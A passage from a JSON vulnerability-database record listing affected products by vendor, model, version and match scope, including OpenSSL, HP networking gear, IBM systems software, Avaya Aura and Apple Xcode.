        "model": "aspera mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2"
      },
      {
        "model": "msr93x",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.3"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.1"
      },
      {
        "model": "project openssl beta4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "h.10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "r1104",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1620"
      },
      {
        "model": "upward integration modules hardware management pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.2"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.2"
      },
      {
        "model": "u200s and cs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "netscaler application delivery controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.0l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.0"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.20"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "upward integration modules integrated installer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.2"
      },
      {
        "model": "general parallel file system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5.0"
      },
      {
        "model": "project openssl beta5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "bladecenter -e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7967"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.1"
      },
      {
        "model": "aspera drive",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.1.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.0"
      },
      {
        "model": "russian version r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6602"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.3"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1.4"
      },
      {
        "model": "tivoli workload scheduler distributed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4"
      },
      {
        "model": "f1000-e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.3"
      },
      {
        "model": "project openssl 0.9.8p",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2.0"
      },
      {
        "model": "bladecenter -h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8852"
      },
      {
        "model": "12500(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "v7)0"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "g switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48000"
      },
      {
        "model": "bladecenter -ht",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8750"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.1"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "vcx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gv1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "57000"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.5.0"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.0"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.3.1"
      },
      {
        "model": "msr50-g2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.1"
      },
      {
        "model": "insight control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "systems director common agent for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.5"
      },
      {
        "model": "r",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.0.1"
      },
      {
        "model": "esxi esxi550-20150110",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "ei switch series r2221p08",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5500"
      },
      {
        "model": "kb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "msr30",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.8.0"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "129000"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.3"
      },
      {
        "model": "msr1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "msr30 russian version 2513l40.ru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "i.10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "tivoli workload scheduler distributed fp05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.1"
      },
      {
        "model": "tivoli workload scheduler distributed fp01",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.0"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "project openssl 0.9.8za",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "m.08",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "project openssl 0.9.8m beta1",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.4.1"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "a6600 r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "project openssl 0.9.8q",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "9500e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-493"
      },
      {
        "model": "msr20 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.2"
      },
      {
        "model": "switch series r1118p11",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5830"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.8"
      },
      {
        "model": "rational application developer for websphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.0.1"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "tivoli workload scheduler for z/os connector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.6"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.3.6"
      },
      {
        "model": "secblade iii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "rational software architect realtime edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "flex system fc3171 8gb san switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.3"
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-453"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.3"
      },
      {
        "model": "security network intrusion prevention system gv200",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1"
      },
      {
        "model": "sle client tools for x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4"
      },
      {
        "model": "msr30 r2513p33",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "tivoli workload scheduler for z/os connector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "msr50-g2 r2513p33",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "project openssl 1.0.1c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-467"
      },
      {
        "model": "msr1000 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "vb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "bladecenter -e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1881"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.2"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "56001"
      },
      {
        "model": "ka",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "office connect pk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "18100"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8v"
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "project openssl 1.0.1f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "yb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "f5000 f3210p22",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.2"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.4.1"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.3.1"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.1"
      },
      {
        "model": "upward integration modules scvmm add-in",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.2"
      },
      {
        "model": "systems director common agent for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.5"
      },
      {
        "model": "project openssl 0.9.8g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cms r17",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "flex system fc3171 8gb san switch and san pass-thru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.5.03.00"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.41"
      },
      {
        "model": "aspera ondemand for google cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.8.2.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.21"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.0"
      },
      {
        "model": "aura utility services sp7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.4"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.0"
      },
      {
        "model": "tivoli workload scheduler distributed fp04",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "hsr6602 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.1"
      },
      {
        "model": "aspera console",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.5.3"
      },
      {
        "model": "insight control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "mcp russian version r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6600"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "tivoli workload scheduler for applications fp02",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "ei switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51200"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "project openssl beta2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "bladecenter -s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7779"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5.3"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.2.2"
      },
      {
        "model": "flex system fc3171 8gb san pass-thru",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.2"
      },
      {
        "model": "msr50 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1.2"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.2"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "hsr6800 r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.20"
      },
      {
        "model": "msr3000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "hp-ux b.11.11",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "aspera faspex",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.9"
      },
      {
        "model": "tivoli dynamic workload console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.40"
      },
      {
        "model": "msr2000 r0106p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "va",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.32"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "aspera ondemand for softlayer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "storage provisioning manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.4"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125000"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.4"
      },
      {
        "model": "switch series r1809p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5800"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.0"
      },
      {
        "model": "aspera ondemand for azure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "r2311p05",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5700"
      },
      {
        "model": "aspera shares",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.9"
      },
      {
        "model": "hi switch series r5501p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5500"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0"
      },
      {
        "model": "qradar risk manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.3"
      },
      {
        "model": "flex system fc3171 8gb san pass-thru",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "secblade iii r3820p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "msm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.46.4.2.1"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.3.1"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "aspera client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "project openssl 0.9.8l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.1"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.3"
      },
      {
        "model": "flex system fc3171 8gb san pass-thru",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "hsr6800 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.20"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1"
      },
      {
        "model": "systems director common agent for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.4"
      },
      {
        "model": "aspera outlook plugin",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "project openssl 0.9.8zc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "switch series (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10500v5)0"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.1.0"
      },
      {
        "model": "r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6602"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.5"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.3"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
